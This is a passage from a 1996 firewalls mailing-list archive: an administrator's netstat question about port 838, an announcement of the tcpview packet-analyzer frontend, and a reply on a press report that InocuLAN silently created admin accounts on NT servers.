running Windows95: sunserver % netstat -a | grep some-pc tcp 0 0 sunserver.838 some-pc.19166 ESTABLISHED tcp 0 0 sunserver.838 some-pc.2643 ESTABLISHED tcp 0 0 sunserver.838 some-pc.3210 ESTABLISHED There is no mention of port 838 in the Assigned Numbers RFC1700. Is this the latest Assigned Numbers RFC? Thanks for your help. +---------------------------------------------+ | | | David Worthington | | (dave@chadwyck.co.uk) | | Systems Administrator | | | | Chadwyck-Healey Ltd | | The Quorum, Barnwell Road | | Cambridge CB5 8SW, England | | Tel: (01223) 215512 | | Fax: (01223) 215513 | | | +---------------------------------------------+ From firewalls-owner Thu Feb 15 07:54:34 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id GAA04766 for firewalls-outgoing; Thu, 15 Feb 1996 06:43:45 -0800 (PST) Received: from darkstar.sysinfo.com (darkstar.sysinfo.com [204.246.65.62]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id GAA04731 for ; Thu, 15 Feb 1996 06:43:34 -0800 (PST) Received: from darkstar.sysinfo.com (darkstar.sysinfo.com [204.246.65.62]) by darkstar.sysinfo.com (8.6.11/8.6.9) with SMTP id IAA05108 for ; Thu, 15 Feb 1996 08:51:52 -0600 Date: Thu, 15 Feb 1996 08:51:47 -0600 (CST) From: "R. M. DuFresne" To: "firewalls@GreatCircle.COM" Subject: tcpdump motif frontend pointers... Message-ID: Oraganization: MINN. Information Systems MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk et. al., since there has been so much interest in this package I'm posting the lsm for it to the list. Enjoy folks : Begin3 Title: tcpview Version: 1.0 Entered-date: 18MAY95 Description: A Motif-based TCP/IP protocol analyzer Keywords: ethernet tcpdump Motif Author: martinh@cac.washington.edu (Martin Hunt) tcpdump@ee.lbl.gov (Steve McCann) Maintained-by: fillod@iutserveur.univ-lyon1.fr (Stephane FILLOD) Primary-site: iutserveur.univ-lyon1.fr /pub/linux/tcpview 291kB tcpview-1.0.tar.gz 756 tcpview-1.0.lsm Alternate-site: sunsite.unc.edu /pub/Linux/system/Network/management Original-site: ftp.cac.washington.edu /pub/noc-tools/tcpview 484kB tcpview-1.0.tar.Z 3kB tcpview-1.0.tar.readme 1.3MB tcpview-1.0.dec.tar.Z 1.8MB tcpview-1.0.sun.tar.Z Platforms: Sun/OS, Ultrix, BSD, Linux, Motif required ! Copying-policy: BSD, University of Washington End If anyone can't get to it you are welcome to e-mail me and I'll send it to you direct. Later, Ron DuFresne ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ admin & senior consultant: darkstar.sysinfo.com http://darkstar.sysinfo.com "Cutting the space budget really restores my faith in humanity. It eliminates dreams, goals, and ideals and lets us get straight to the business of hate, debauchery, and self-annihilation." -- Johnny Hart ***testing, only testing, and damn good at it too!*** OK, so you're a Ph.D. Just don't touch anything. From firewalls-owner Thu Feb 15 07:57:43 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id GAA05042 for firewalls-outgoing; Thu, 15 Feb 1996 06:53:05 -0800 (PST) Received: from icicle.winternet.com (icicle.winternet.com [198.174.169.5]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with ESMTP id GAA05037 for ; Thu, 15 Feb 1996 06:53:00 -0800 (PST) Received: from parka (dufresne@parka.winternet.com [198.174.169.9]) by icicle.winternet.com (8.7.3/8.7.2) with ESMTP id IAA18529; Thu, 15 Feb 1996 08:51:37 -0600 (CST) Received: (from dufresne@localhost) by parka (8.6.12/8.6.12) id IAA12127; Thu, 15 Feb 1996 08:51:35 -0600 Posted-Date: Thu, 15 Feb 1996 08:51:35 -0600 Date: Thu, 15 Feb 1996 08:51:35 -0600 (CST) From: Ron DuFresne To: "Ralph C. Wolman" cc: firewalls@greatcircle.com Subject: Re: article, pcweek: InocuLAN leaves NT servers open! In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Ralph, This is certainly true, I left alot out of the article, including: ...Cheyenne officials acknowledged the problem and sent out notification to registered users... My intent here was not to start a 'mail war' either. But twofold in other regards: 1> To point folks to some reading they may have not had time to get around to since we all can get very busy and leave these rags laying in piles for long periods of time. 2> To point out that their are some strange things happening with products for NT. Do folks here on the list often find that when they install SW on a Unix box that there are admin/root accounts created behind their backs? Again, the points here are made not to star a war, but to let list readers no that they have to be very careful with the SW they decided to install on their boxes when playing without source.... Later, Ron DuFresne On Thu, 15 Feb 1996, Ralph C. Wolman wrote: > This is *not* meant to start a mail war... and I'm sure starting > a discussion about this is not appropriate for this group. However, > since we have to put up with enough mis-information and partial > information in the press, you should at least be fair and give the > list *all* of the information. > > What you say is certainly printed in the article. However, there > is an important additional piece of information you have left out. > > And I quote, > > "A version of InocuLAN that will prompt administrators for a > domain password on installation will be available this week, according > to Cheyenne officials. > > "Cheyenne, of Roslyn Heights, N.Y., can be reached at (800) 243